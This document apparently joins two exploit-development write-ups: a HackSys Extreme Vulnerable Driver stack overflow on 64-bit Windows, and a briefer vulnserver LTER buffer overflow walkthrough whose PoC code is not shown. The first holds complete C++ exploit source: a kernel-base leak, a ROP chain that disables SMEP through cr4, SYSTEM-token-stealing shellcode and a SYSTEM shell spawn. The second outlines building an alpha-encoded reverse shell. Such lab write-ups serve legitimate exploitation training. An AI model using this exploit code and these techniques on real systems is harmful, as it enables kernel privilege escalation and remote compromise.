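    uint64_t cr4_without_smep = cr4_with_smep & ~SMEP_BIT;   // same value with bit 20 cleared

    printf("SMEP on:  0x%llx\n", (unsigned long long)cr4_with_smep);
    printf("SMEP off: 0x%llx\n", (unsigned long long)cr4_without_smep); // prints 0x70678
    return 0;
}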

Getting Kernel Base Address

The first thing we want to do is get the base address of the kernel. If we don't get the base address, we can't calculate the runtime addresses of the gadgets we want to use, since we only know their offsets relative to that base and kernel ASLR changes where the kernel is loaded on each boot. In WinDBG, you can simply run lm sm to list all loaded kernel modules alphabetically:

---SNIP---
fffff800`10c7b000 fffff800`1149b000   nt
---SNIP---

We also need a way to get this address in our exploit code. For this part, I leaned heavily on code I was able to find by doing Google searches with syntax like site:github.com NtQuerySystemInformation and seeing what I could find. Luckily, I was able to find a lot of code that met my needs perfectly. Unfortunately, on Windows 10 your process requires some level of elevation in order to use this API. But I had already used the API previously, and was quite fond of it after it gave me so much trouble the first time I used it to get the kernel base address, so I wanted to use it again, this time in C++ instead of Python.

Using a lot of the tricks that I learned from @tekwizz123's HEVD exploits, I was able to get the API imported into my exploit code and use it effectively. I won't go too much into the code here, but this is the function and the typedefs it references to retrieve the kernel base address for us:

typedef struct SYSTEM_MODULE {
    ULONG                Reserved1;
    ULONG                Reserved2;
    ULONG                Reserved3;
    PVOID                ImageBaseAddress;
    ULONG                ImageSize;
    ULONG                Flags;
    WORD                 Id;
    WORD                 Rank;
    WORD                 LoadCount;
    WORD                 NameOffset;
    CHAR                 Name[256];
}SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG                ModulesCount;
    SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 0xb
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)(
    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout PVOID SystemInformation,
    __in ULONG SystemInformationLength,
    __out_opt PULONG ReturnLength
    );

INT64 get_kernel_base() {

    cout << "[>] Getting kernel base address..." << endl;

    //https://github.com/koczkatamas/CVE-2016-0051/blob/master/EoP/Shellcode/Shellcode.cpp
    //also using the same import technique that @tekwizz123 showed us

    PNtQuerySystemInformation NtQuerySystemInformation =
        (PNtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) {

        cout << "[!] Failed to get the address of NtQuerySystemInformation." << endl;
        cout << "[!] Last error " << GetLastError() << endl;
        exit(1);
    }

    ULONG len = 0;
    NtQuerySystemInformation(SystemModuleInformation,
        NULL,
        0,
        &len);

    PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION)
        VirtualAlloc(NULL,
            len,
            MEM_RESERVE | MEM_COMMIT,
            PAGE_EXECUTE_READWRITE);

    NTSTATUS status = NtQuerySystemInformation(SystemModuleInformation,
        pModuleInfo,
        len,
        &len);

    if (status != (NTSTATUS)0x0) {
        cout << "[!] NtQuerySystemInformation failed!" << endl;
        exit(1);
    }

    PVOID kernelImageBase = pModuleInfo->Modules[0].ImageBaseAddress;

    cout << "[>] ntoskrnl.exe base address: 0x" << hex << kernelImageBase << endl;

    return (INT64)kernelImageBase;
}

This code imports NtQuerySystemInformation from ntdll.dll and allows us to use it with the SystemModuleInformation class, which returns a nice struct containing ModulesCount (how many kernel modules are loaded) and an array of the Modules themselves, each of which has a lot of struct members, including a Name. In all my research I couldn't find an example where the kernel image wasn't at index value 0, so that's what I've implemented here.

You could use a lot of the cool string functions in C++ to easily get the base address of any kernel mode driver as long as you have the name of the .sys file. You could cast the Modules.Name member to a string and do a substring match routine to locate your desired driver as you iterate through the array and return the base address. So now that we have the base address figured out, we can move on to hunting the gadgets.
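Before moving on, here is a minimal sketch of that substring-match idea. This is a hypothetical helper, not part of the original exploit; it reuses the structs defined above and assumes pModuleInfo has been populated exactly as in get_kernel_base():

#include <cstring> // for strstr

// Hypothetical helper: walk the module list returned by NtQuerySystemInformation and
// return the base address of the first module whose Name contains the given substring.
PVOID get_driver_base(PSYSTEM_MODULE_INFORMATION pModuleInfo, const char* name) {
    for (ULONG i = 0; i < pModuleInfo->ModulesCount; i++) {
        // Name is a NUL-terminated path such as "\SystemRoot\System32\drivers\HEVD.sys"
        if (strstr(pModuleInfo->Modules[i].Name, name) != NULL) {
            return pModuleInfo->Modules[i].ImageBaseAddress;
        }
    }
    return NULL; // not found
}

// Usage: PVOID hevd_base = get_driver_base(pModuleInfo, "HEVD.sys");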

Hunting Gadgets

The value of these gadgets is that they reside in kernel space so SMEP can’t interfere here. We can place them directly on the stack and overwrite rip so that we are always executing the first gadget and then returning to the stack where our ROP chain resides without ever going into user space. (If you have a preferred method for gadget hunting in the kernel let me know, I tried to script some things up in WinDBG but didn’t get very far before I gave up after it was clear it was super inefficient.) Original work on the gadget locations as far as I know is located here: http://blog.ptsecurity.com/2012/09/bypassing-intel-smep-on-windows-8-x64.html
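If you did want to script it up from user mode, one approach (not what I used here; a sketch that assumes the on-disk ntoskrnl.exe matches the running kernel and that mapping it with LoadLibraryEx preserves the image layout) is to map the kernel image into your own process, scan it for the opcode bytes, and treat any hit as an offset from the kernel base:

#include <Windows.h>
#include <cstring>

// Sketch: find the offset of a byte pattern (e.g. 0F 22 E1 C3 for mov cr4, rcx ; ret)
// inside a user-mode mapping of ntoskrnl.exe. The returned offset can then be added to
// the kernel base leaked via NtQuerySystemInformation. Illustrative only.
INT64 find_gadget_offset(const BYTE* pattern, SIZE_T pattern_len) {
    HMODULE ntos = LoadLibraryExA("ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
    if (!ntos) return -1;

    // Use the PE headers to know how far the mapped image extends.
    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)ntos;
    PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)((BYTE*)ntos + dos->e_lfanew);
    SIZE_T image_size = nt->OptionalHeader.SizeOfImage;

    const BYTE* base = (const BYTE*)ntos;
    for (SIZE_T i = 0; i + pattern_len <= image_size; i++) {
        if (memcmp(base + i, pattern, pattern_len) == 0) {
            FreeLibrary(ntos);
            return (INT64)i; // offset relative to the image base
        }
    }

    FreeLibrary(ntos);
    return -1;
}

// Usage: BYTE mov_cr4_ret[] = { 0x0F, 0x22, 0xE1, 0xC3 };
//        INT64 offset = find_gadget_offset(mov_cr4_ret, sizeof(mov_cr4_ret));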

Again, just following along with Abatchy's blog, we can find our first gadget (the pop rcx that starts the chain) by locating a routine that pops a value off the stack into rcx and returns soon after; combined with a second gadget, this lets us place an arbitrary value into cr4. Luckily for us, such a gadget exists inside of nt!HvlEndSystemInterrupt.

We can find it in WinDBG with the following:

kd> uf HvlEndSystemInterrupt
nt!HvlEndSystemInterrupt:
fffff800`10dc1560 4851            push    rcx
fffff800`10dc1562 50              push    rax
fffff800`10dc1563 52              push    rdx
fffff800`10dc1564 65488b142588610000 mov   rdx,qword ptr gs:[6188h]
fffff800`10dc156d b970000040      mov     ecx,40000070h
fffff800`10dc1572 0fba3200        btr     dword ptr [rdx],0
fffff800`10dc1576 7206            jb      nt!HvlEndSystemInterrupt+0x1e (fffff800`10dc157e)

nt!HvlEndSystemInterrupt+0x18:
fffff800`10dc1578 33c0            xor     eax,eax
fffff800`10dc157a 8bd0            mov     edx,eax
fffff800`10dc157c 0f30            wrmsr

nt!HvlEndSystemInterrupt+0x1e:
fffff800`10dc157e 5a              pop     rdx
fffff800`10dc157f 58              pop     rax
fffff800`10dc1580 59              pop     rcx // Gadget at offset from nt: +0x146580
fffff800`10dc1581 c3              ret

As Abatchy did, I’ve added a comment so you can see the gadget we’re after. We want this:

pop rcx

ret routine because if we can place an arbitrary value into rcx, there is a second gadget which allows us to mov cr4, rcx and then we’ll have everything we need.

Gadget 2 is nested within the KiEnableXSave kernel routine as follows (with some snipping) in WinDBG:

kd> uf nt!KiEnableXSave
nt!KiEnableXSave:

---SNIP---

nt! ?? ::OKHAJAOM::`string'+0x32fc:
fffff800`1105142c 480fbaf112      btr     rcx,12h
fffff800`11051431 0f22e1          mov     cr4,rcx // Gadget at offset from nt: +0x3D6431
fffff800`11051434 c3              ret

So with these two gadget locations known to us (that is, their offsets relative to the kernel base), we can now implement them in our code. To be clear, the payload we'll be sending will look like this when we overwrite the stack:

  • ‘A’ characters * 2056
  • our pop rcx gadget
  • The value we want rcx to hold
  • our mov cr4, rcx gadget
  • pointer to our shellcode.

So for those following along at home: we overwrite rip with our first gadget, which pops the first 8-byte value on the stack into rcx. What value is that? It's the value we eventually want cr4 to hold, and we can simply place it onto the stack with our stack overflow. So we pop that value into rcx, then the gadget hits a ret opcode which sends rip to our second gadget, which does mov cr4, rcx so that cr4 now holds the SMEP-disabled value we want. That gadget then hits its own ret opcode and returns rip to... what? A pointer to our userland shellcode, which will now run seamlessly because SMEP is disabled.

You can see this implemented in code here:

 BYTE input_buff[2088] = { 0 };

    INT64 pop_rcx_offset = kernel_base + 0x146580; // gadget 1
    cout << "[>] POP RCX gadget located at: 0x" << pop_rcx_offset << endl;
    INT64 rcx_value = 0x70678; // value we want placed in cr4
    INT64 mov_cr4_offset = kernel_base + 0x3D6431; // gadget 2
    cout << "[>] MOV CR4, RCX gadget located at: 0x" << mov_cr4_offset << endl;


    memset(input_buff, '\x41', 2056);
    memcpy(input_buff + 2056, (PINT64)&pop_rcx_offset, 8); // pop rcx
    memcpy(input_buff + 2064, (PINT64)&rcx_value, 8); // disable SMEP value
    memcpy(input_buff + 2072, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx
    memcpy(input_buff + 2080, (PINT64)&shellcode_addr, 8); // shellcode

CR4 Value

Again, just following along with Abatchy, I'll go ahead and place the value 0x70678 into cr4. In binary that's 111 0000 0110 0111 1000, which means bit 20, the SMEP bit, is set to 0. You can read more about what values to input here on j00ru's blog post about SMEP.

So if cr4 holds this value, SMEP should be disabled.

Restoring Execution

The hardest part of this exploit for me was restoring execution after the shellcode ran. Unfortunately, our exploit overwrites several register values and corrupts our stack quite a bit. When my shellcode was done running (not really my shellcode, it's borrowed from @Cneelis), this is what my callstack looked like along with my stack memory values:

Restoring execution will always be pretty specific to what version of HEVD you're using, and perhaps also what build of Windows you're on, as some of the kernel routines will change, so I won't go too much in depth here. What I did to figure out why I kept crashing so much after returning to the address shown in the screenshot, HEVD!IrpDeviceIoCtlHandler+0x19f (located on the right hand side of the screenshot at ffff9e8196b99158), was to notice that rsi is typically zeroed out if you send regular-sized buffers to the driver routine.

So if you were to send a non-overflowing buffer and put a breakpoint at nt!IopSynchronousServiceTail+0x1a0 (which is where rip would end up if we took a ret at our return address of ffff9e8196b99158), you would see that rsi is typically 0 when system service routines exit normally. So when I returned, I had to have an rsi value of 0 in order to stop from getting an exception.

I tried just following the code through until I reached an exception with a non-zero rsi but wasn’t able to pinpoint exactly where the fault occurs or why. The debug information I got from all my bugchecks didn’t bring me any closer to the answer (probably user error). I noticed that if you don’t null out rsi before returning, rsi wouldn’t be referenced in any way until a value was popped into it from the stack which happened to be our IOCTL code, so this confused me even more.

Anyways, my hacky way of tracing through normally sized buffers and taking notes of the register values at the same point we return to out of our shellcode did work, but I’m still unsure why 😒.

Conclusion

All in all, the ROP chain to disable SMEP via cr4 wasn't too complicated; this could even serve as an introduction to ROP chains, in my opinion, because as far as ROP chains go this one is fairly straightforward. However, restoring execution after our shellcode was a nightmare for me. A lot of time was wasted by misinterpreting the callstack readouts from WinDBG (a lesson learned). As @ihack4falafel says, make sure you keep an eye on @rsp in your memory view in WinDBG anytime you are messing with the stack.

Exploit code here.

Thanks again to all the bloggers who got me through the HEVD exploits:

Huge thanks to HackSysTeam for developing the driver for us to all practice on, can’t wait to tackle it on Linux!

#include <iostream>
#include <string>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL                   0x222003

typedef struct SYSTEM_MODULE {
    ULONG                Reserved1;
    ULONG                Reserved2;
    ULONG                Reserved3;
    PVOID                ImageBaseAddress;
    ULONG                ImageSize;
    ULONG                Flags;
    WORD                 Id;
    WORD                 Rank;
    WORD                 LoadCount;
    WORD                 NameOffset;
    CHAR                 Name[256];
}SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG                ModulesCount;
    SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 0xb
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)(
    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout PVOID SystemInformation,
    __in ULONG SystemInformationLength,
    __out_opt PULONG ReturnLength
    );

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver" << endl;
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: 0x" << hex
        << (INT64)hFile << endl;

    return hFile;
}

void send_payload(HANDLE hFile, INT64 kernel_base) {

    cout << "[>] Allocating RWX shellcode..." << endl;

    // slightly altered shellcode from 
    // https://github.com/Cn33liz/HSEVD-StackOverflowX64/blob/master/HS-StackOverflowX64/HS-StackOverflowX64.c
    // thank you @Cneelis
    BYTE shellcode[] =
        "\x65\x48\x8B\x14\x25\x88\x01\x00\x00"      // mov rdx, [gs:188h]       ; Get _ETHREAD pointer from KPCR
        "\x4C\x8B\x82\xB8\x00\x00\x00"              // mov r8, [rdx + b8h]      ; _EPROCESS (kd> u PsGetCurrentProcess)
        "\x4D\x8B\x88\xf0\x02\x00\x00"              // mov r9, [r8 + 2f0h]      ; ActiveProcessLinks list head
        "\x49\x8B\x09"                              // mov rcx, [r9]            ; Follow link to first process in list
        //find_system_proc:
        "\x48\x8B\x51\xF8"                          // mov rdx, [rcx - 8]       ; Offset from ActiveProcessLinks to UniqueProcessId
        "\x48\x83\xFA\x04"                          // cmp rdx, 4               ; Process with ID 4 is System process
        "\x74\x05"                                  // jz found_system          ; Found SYSTEM token
        "\x48\x8B\x09"                              // mov rcx, [rcx]           ; Follow _LIST_ENTRY Flink pointer
        "\xEB\xF1"                                  // jmp find_system_proc     ; Loop
        //found_system:
        "\x48\x8B\x41\x68"                          // mov rax, [rcx + 68h]     ; Offset from ActiveProcessLinks to Token
        "\x24\xF0"                                  // and al, 0f0h             ; Clear low 4 bits of _EX_FAST_REF structure
        "\x49\x89\x80\x58\x03\x00\x00"              // mov [r8 + 358h], rax     ; Copy SYSTEM token to current process's token
        "\x48\x83\xC4\x40"                          // add rsp, 040h
        "\x48\x31\xF6"                              // xor rsi, rsi             ; Zeroing out rsi register to avoid Crash
        "\x48\x31\xC0"                              // xor rax, rax             ; NTSTATUS Status = STATUS_SUCCESS
        "\xc3";

    LPVOID shellcode_addr = VirtualAlloc(NULL,
        sizeof(shellcode),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    memcpy(shellcode_addr, shellcode, sizeof(shellcode));

    cout << "[>] Shellcode allocated in userland at: 0x" << (INT64)shellcode_addr
        << endl;

    BYTE input_buff[2088] = { 0 };

    INT64 pop_rcx_offset = kernel_base + 0x146580; // gadget 1
    cout << "[>] POP RCX gadget located at: 0x" << pop_rcx_offset << endl;
    INT64 rcx_value = 0x70678; // value we want placed in cr4
    INT64 mov_cr4_offset = kernel_base + 0x3D6431; // gadget 2
    cout << "[>] MOV CR4, RCX gadget located at: 0x" << mov_cr4_offset << endl;


    memset(input_buff, '\x41', 2056);
    memcpy(input_buff + 2056, (PINT64)&pop_rcx_offset, 8); // pop rcx
    memcpy(input_buff + 2064, (PINT64)&rcx_value, 8); // disable SMEP value
    memcpy(input_buff + 2072, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx
    memcpy(input_buff + 2080, (PINT64)&shellcode_addr, 8); // shellcode

    // keep this here for testing so you can see what normal buffers do to subsequent routines
    // to learn from for execution restoration
    /*
    BYTE input_buff[2048] = { 0 };
    memset(input_buff, '\x41', 2048);
    */

    cout << "[>] Input buff located at: 0x" << (INT64)&input_buff << endl;

    DWORD bytes_ret = 0x0;

    cout << "[>] Sending payload..." << endl;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        sizeof(input_buff),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {
        cout << "[!] DeviceIoControl failed!" << endl;
    }
}

INT64 get_kernel_base() {

    cout << "[>] Getting kernel base address..." << endl;

    //https://github.com/koczkatamas/CVE-2016-0051/blob/master/EoP/Shellcode/Shellcode.cpp
    //also using the same import technique that @tekwizz123 showed us

    PNtQuerySystemInformation NtQuerySystemInformation =
        (PNtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) {

        cout << "[!] Failed to get the address of NtQuerySystemInformation." << endl;
        cout << "[!] Last error " << GetLastError() << endl;
        exit(1);
    }

    ULONG len = 0;
    NtQuerySystemInformation(SystemModuleInformation,
        NULL,
        0,
        &len);

    PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION)
        VirtualAlloc(NULL,
            len,
            MEM_RESERVE | MEM_COMMIT,
            PAGE_EXECUTE_READWRITE);

    NTSTATUS status = NtQuerySystemInformation(SystemModuleInformation,
        pModuleInfo,
        len,
        &len);

    if (status != (NTSTATUS)0x0) {
        cout << "[!] NtQuerySystemInformation failed!" << endl;
        exit(1);
    }

    PVOID kernelImageBase = pModuleInfo->Modules[0].ImageBaseAddress;

    cout << "[>] ntoskrnl.exe base address: 0x" << hex << kernelImageBase << endl;

    return (INT64)kernelImageBase;
}

void spawn_shell() {

    cout << "[>] Spawning nt authority/system shell..." << endl;

    PROCESS_INFORMATION pi;
    ZeroMemory(&pi, sizeof(pi));

    STARTUPINFOA si;
    ZeroMemory(&si, sizeof(si));

    CreateProcessA("C:\\Windows\\System32\\cmd.exe",
        NULL,
        NULL,
        NULL,
        0,
        CREATE_NEW_CONSOLE,
        NULL,
        NULL,
        &si,
        &pi);
}

int main() {

    HANDLE hFile = grab_handle();

    INT64 kernel_base = get_kernel_base();
    send_payload(hFile, kernel_base);
    spawn_shell();
}

Buffer Overflow w/ Restricted Characters

Environment:

  • Kali Linux
  • Windows Vista
  • Vulnerable application: vulnserver.exe (LTER command)


Vulnserver.exe is meant to be exploited mainly with buffer overflow vulnerabilities. More info about this application and where to download it can be found here:



~~~~~//********//~~~~~~


For the LTER command, there are two ways to exploit the buffer overflow vulnerability; however, both exploits will have similar restricted characters.

- Part 1: Vanilla Buffer Overflow w/ Restricted Characters
- Part 2: SEH-based Buffer Overflow w/ Restricted Characters (see the separate Part 2 write-up)

Let's get started...

Fuzzing

Similar to the GMON write-up, I used boofuzz to do the initial fuzzing.

...and after crashing the program, we recreate the crash using the following Proof-of-Concept


We get a pretty vanilla buffer overflow where EIP has been overwritten with \x41s.

Also note that ESP currently points to our buffer. This is key once we figure out an address to redirect EIP to.


Now we will need to determine our offset and see exactly which part of our buffer overwrites the EIP register.

As usual, this is accomplished using Metasploit's pattern_create.rb to generate 3000 unique characters.


Update our POC with our unique characters, send the exploit, and examine the crash in immunity debugger.


Here we can see that EIP has been overwritten with the following values: 386F4337


Metasploit's pattern_offset.rb can be used to determine the offset with this value.

Once we determine the offset, we update our POC again



We send the POC one more time and examine the crash... if our offset is correct, EIP should be overwritten with \x42s.

In this case, we can see that 42424242 was successfully loaded into the EIP register.


Finding bad characters

Now that we are able to redirect EIP, we will need to find an address to redirect it to. Since we know the ESP register points to our buffer, we will be looking for a JMP ESP address.

However, before we choose an address, we will need to verify if there are any bad characters.

We update the POC with the following 256 unique hex characters


After running a few tests, it's verified that anything over \x7F has \x7F subtracted from it, as we can see below in our dump, such that \x80 - \x7F = \x01.

This means we will not be able to use any hex characters over \x7F.

Allowed characters:

\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f
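The original PoC for this step isn't shown above. As a rough illustration (written in C++ to stay consistent with the rest of the code in this document, even though vulnserver PoCs are typically Python), building the bad-character test buffer might look like this:

#include <string>

// Sketch: build the \x01-\xFF test string that gets appended after the EIP overwrite so
// each byte can be inspected in the debugger's memory dump. \x00 is left out up front
// since it terminates the string.
std::string make_badchar_buffer() {
    std::string buf;
    for (int b = 0x01; b <= 0xFF; b++) {
        buf.push_back((char)b);
    }
    return buf;
}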



Now we will need a CALL ESP or JMP ESP address. This will ultimately call our Cs, where our reverse shell will be loaded, while keeping in mind the restricted characters.

We find the following address using mona.py in immunity debugger

FF E4 = jmp esp
Address: 62501203


We can verify this address is a JMP ESP by searching for it



At this point, we can update our EIP overwrite to redirect to this JMP ESP address


As we follow the crash in Immunity, we can see that EIP has been successfully overwritten with our JMP ESP address


...once we take the JMP ESP, we are redirected to the top of our Cs




Reverse shell time!

We will need to create our reverse shell and encode it with x86/alpha_mixed in order to avoid the restricted characters


We update our POC one last time

Again we follow the jmp esp and we hit the beginning of our reverse shell. We let the code execution continue and successfully get a reverse shell in our Kali listener.



Final Proof-of-Concept



